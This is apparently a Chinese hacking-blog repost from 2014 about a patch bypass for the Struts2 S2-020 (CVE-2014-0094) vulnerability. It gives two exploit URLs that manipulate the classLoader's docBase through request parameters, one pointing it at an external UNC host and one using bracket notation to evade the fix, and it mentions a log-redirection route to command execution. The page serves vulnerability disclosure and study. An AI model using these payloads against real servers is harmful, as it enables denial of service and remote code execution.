记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Struts2再曝高危漏洞(S2-020 | CVE-2014-0094漏洞补丁绕过)

2014-04-24 16:15

显示不全请点击全屏阅读

之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用! 

暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat利用方式:

http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test

绕过方式是:

http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx

顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。


作者:园长MM

原文:http://zone.wooyun.org/content/11876

 

知识来源: www.cnseay.com/3860/

阅读:270528 | 评论:0 | 标签:渗透测试 Struts2漏洞 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“Struts2再曝高危漏洞(S2-020 | CVE-2014-0094漏洞补丁绕过)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云